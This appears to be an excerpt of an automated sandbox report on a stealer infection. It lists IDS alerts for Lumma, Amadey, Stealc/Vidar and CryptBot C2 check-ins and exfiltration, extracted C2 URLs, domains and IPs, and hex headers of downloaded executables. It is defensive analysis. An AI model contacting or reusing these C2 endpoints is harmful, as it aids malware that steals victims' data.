                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53671 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53673 version: TLS 1.2
                            Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: f46bdbcca4.tmp, 00000020.00000003.2055762114.00000000034D8000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.tmp, 00000020.00000003.2051282895.00000000031A0000.00000004.00001000.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\36469\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\36469
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:53302 -> 185.215.113.115:80
                            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.11:53457 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.11:53464
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53466 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53470 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53475 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.11:50829 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.11:59567 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.11:53647 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.11:60628 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.11:57344 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.11:58574 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.11:62325 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53479 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53483 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.11:50808 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53487 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53490 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53497 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53517 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.11:53531 -> 94.156.102.239:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53534 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53544 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53563 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059149 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click) : 192.168.2.11:57756 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53611 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53626 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53631 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53634 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53640 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53636 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53656 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:53639 -> 185.215.113.115:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.11:53660 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49708 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49708 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49710 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49707 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49707 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49765 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53469 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53471 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53469 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53471 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:53481 -> 104.102.49.254:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:53478 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53485 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.11:53496 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53500 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.11:53494 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53501 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53539 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53532 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.11:53532 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53535 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.11:53535 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.11:53496
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53526 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.11:53530 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.11:53530 -> 116.202.5.153:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53608 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53608 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53622 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53622 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:53640 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:53638 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:53656 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53660 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.11:53498
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53669 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53669 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:53671 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53671 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53666 -> 104.21.18.116:443
                            Source: Malware configuration extractorURLs: http://185.215.113.115/c4becf79229cb002.php
                            Source: Malware configuration extractorURLs: https://warlikedbeliev.org/api
                            Source: Malware configuration extractorIPs: 185.215.113.43
                            Source: unknownDNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: breakfasutwy.cyou replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: DGGKjBirXBdcY.DGGKjBirXBdcY replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
                            Source: unknownDNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)
                            Source: global trafficTCP traffic: 192.168.2.11:53524 -> 193.176.153.180:2024
                            Source: global trafficTCP traffic: 192.168.2.11:53296 -> 1.1.1.1:53
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:51:29 GMTContent-Type: application/octet-streamContent-Length: 1808896Last-Modified: Sat, 01 Feb 2025 15:09:15 GMTConnection: keep-aliveETag: "679e391b-1b9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 aa c4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 7a 69 70 6a 68 72 61 00 00 1a 00 00 60 4f 00 00 f4 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 6f 72 65 69 74 71 00 10 00 00 00 60 69 00 00 04 00 00 00 74 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 78 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:51:33 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:15 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Sat, 01 Feb 2025 13:57:48 GMTConnection: keep-aliveETag: "679e285c-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 20 ac 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 6f 6d 61 66 76 71 00 30 1a 00 00 80 30 00 00 22 1a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 78 6d 67 76 79 6e 7a 00 10 00 00 00 b0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
